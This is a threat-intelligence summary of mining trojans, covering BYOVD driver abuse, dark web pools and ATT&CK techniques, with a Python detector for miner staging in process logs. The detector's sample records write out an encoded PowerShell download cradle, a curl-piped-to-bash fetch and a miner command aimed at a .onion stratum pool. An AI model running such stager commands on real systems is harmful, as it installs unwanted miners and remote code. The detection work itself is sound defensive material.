The article surveys the threat from mining trojans: malware that infiltrates victims' machines and spends their computing resources on cryptocurrency mining for the attacker's profit, without the owner's consent. It highlights the damage this causes (degraded performance and a higher risk of failures and outages) and the backdoors such trojans drop, which open the host to follow-on attacks. Two trends are stressed: the growing use of BYOVD (Bring Your Own Vulnerable Driver) attacks to disable security software, and the rise of dark web mining pools. The article also identifies the mining trojan groups that were active in 2024.
Affected: Windows and Linux hosts, cloud servers, and organizations across economic sectors (the mining groups named in the article are the attackers, not the victims).
Key points:
- Mining trojans consume victims' computing resources to mine cryptocurrency for the attacker, without the owner's knowledge.
- The added CPU and memory load slows the system and can crash the services running on it.
- The trojans also drop backdoors that enroll the host in a botnet used for further attacks.
- BYOVD (Bring Your Own Vulnerable Driver) attacks are on the rise: the malware loads a legitimately signed driver that has a known vulnerability and abuses it from kernel mode to disable or blind security software.
- Dark web mining pools have emerged, letting attackers mine more discreetly than through public pools.
- Mining malware now allocates resources intelligently, for example by throttling its own CPU usage, so the slowdown is not obvious and users are less likely to notice it.
- The article profiles the active mining trojan groups, their tactics, and the platforms they target.
MITRE ATT&CK techniques:
- T1075: Pass the Hash (retired ID; now T1550.002, Use Alternate Authentication Material: Pass the Hash) – mining trojans reuse stolen credential material to reach and take control of further hosts.
- T1069: Permission Groups Discovery – enumerating local and domain groups to find accounts whose privileges the miner can abuse.
- T1086: PowerShell (retired ID; now T1059.001, Command and Scripting Interpreter: PowerShell) – malicious PowerShell scripts download and execute the mining payload.
- T1190: Exploit Public-Facing Application – mining trojans exploit known vulnerabilities in internet-facing software such as WebLogic and Redis to gain a foothold.
- T1055: Process Injection – some mining trojans inject into legitimate processes to hide the miner and evade detection.
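The PowerShell stager and the exploitation of internet-facing services above leave a recognisable trace in process-creation telemetry. The following detector, an example added to this summary rather than code from the 4hou article or any vendor, scans Sysmon-style process-creation records (the real `Image`, `ParentImage` and `CommandLine` fields) for that trace: it decodes `-EncodedCommand` payloads (base64 of UTF-16LE) before matching, flags download cradles and fetched-script-piped-to-shell patterns, spots stratum pool URLs and xmrig-style options, and calls out a web-facing service spawning a shell or miner. The sample records, the RFC 5737 addresses and the pool names are constructed for the example; the list of "public-facing" parent images beyond java and redis-server and the reading of "dark web pools" as Tor `.onion` endpoints are assumptions.

```python
"""Hunt for cryptominer staging in process-creation records.

Added example for this summary, not code from the 4hou article or any
vendor. Sample records are constructed here; hosts and pool names are
RFC 5737 / example placeholders.
"""
import base64
import re

# PowerShell download-and-execute verbs typical of a miner stager.
CRADLE_RE = re.compile(
    r"DownloadString\s*\(|DownloadFile\s*\(|Invoke-WebRequest|\biwr\b|"
    r"Invoke-Expression|\bIEX\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# The Linux equivalent: a fetched script piped straight into a shell.
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|da)?sh\b", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common ones are covered.
ENCODED_RE = re.compile(r"[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# A stratum pool URL is the most reliable sign a binary is a miner, whatever it is named.
POOL_RE = re.compile(r"stratum\+(?:tcp|ssl|tls)://[^\s'\"]+", re.IGNORECASE)
# Tor hidden-service endpoint (assumption: "dark web pools" are pools reached over Tor).
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.IGNORECASE)
# Long-form xmrig-style options; short forms such as -o or -k are too generic to match on.
MINER_FLAGS = {"--url", "--coin", "--algo", "--donate-level", "--nicehash",
               "--keepalive", "--cpu-max-threads-hint", "--randomx-1gb-pages"}
# Services that should never spawn a shell or a miner: WebLogic runs under java and
# Redis under redis-server (the products the summary names); the rest are assumptions.
PUBLIC_FACING = {"java", "java.exe", "redis-server", "w3wp.exe", "httpd", "nginx"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload as text (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64, or not UTF-16LE text
        return None


def analyze(record):
    """Return the findings for one record (an empty list means nothing suspicious)."""
    findings = []
    image = basename(record["Image"])
    parent = basename(record.get("ParentImage", ""))
    cmd = record.get("CommandLine", "")
    decoded = decode_encoded_command(cmd) if image in POWERSHELL else None
    # Match against the visible command line and, when present, the decoded payload.
    text = cmd if decoded is None else cmd + "\n" + decoded
    if decoded is not None:
        findings.append("encoded PowerShell command decoded")
    if image in POWERSHELL and CRADLE_RE.search(text):
        findings.append("PowerShell download cradle (T1059.001)")
    if PIPE_TO_SHELL_RE.search(text):
        findings.append("fetched script piped into a shell")
    pool = POOL_RE.search(text)
    if pool:
        findings.append("stratum pool " + pool.group(0))
    if ONION_RE.search(text):
        findings.append("Tor hidden-service endpoint")
    # Strip "=value" so that --donate-level=0 and "--donate-level 0" both count.
    flags = MINER_FLAGS & {tok.split("=", 1)[0] for tok in text.split()}
    if flags:
        findings.append("miner options " + " ".join(sorted(flags)))
    if parent in PUBLIC_FACING and (image in SHELLS or pool or flags):
        findings.append(f"{parent} spawned {image}: exploited public-facing app (T1190)")
    return findings


def scan(records):
    """Map record index -> findings, for every record that produced any."""
    result = {}
    for i, record in enumerate(records):
        findings = analyze(record)
        if findings:
            result[i] = findings
    return result


# Constructed sample records: one benign PowerShell run, one encoded download cradle,
# one Redis-spawned shell fetching a script, and one java-spawned renamed miner.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x.ps1')"
SAMPLE_RECORDS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + base64.b64encode(STAGER.encode("utf-16-le")).decode()},
    {"Image": "/bin/sh", "ParentImage": "/usr/bin/redis-server",
     "CommandLine": 'sh -c "curl -fsSL http://203.0.113.9/a.sh | bash"'},
    {"Image": "/tmp/.x/kthreadd", "ParentImage": "/opt/jdk/bin/java",
     "CommandLine": "/tmp/.x/kthreadd --url stratum+tcp://exampleminingpoolab.onion:3333 "
                    "--coin monero --donate-level 0 --cpu-max-threads-hint 50"},
]

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_RECORDS).items():
        print(i, basename(SAMPLE_RECORDS[i]["Image"]), findings)
```

Decoding the encoded command before matching is the step that matters: a stager hidden behind `-enc` never shows `DownloadString` in the raw command line. The `--cpu-max-threads-hint 50` in the last sample is the throttling behaviour the key points describe, which is why the detector keys on pool URLs and option names rather than on CPU load.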
Indicators of Compromise:
- None provided in the article.
Full Story: https://www.4hou.com/posts/gyyj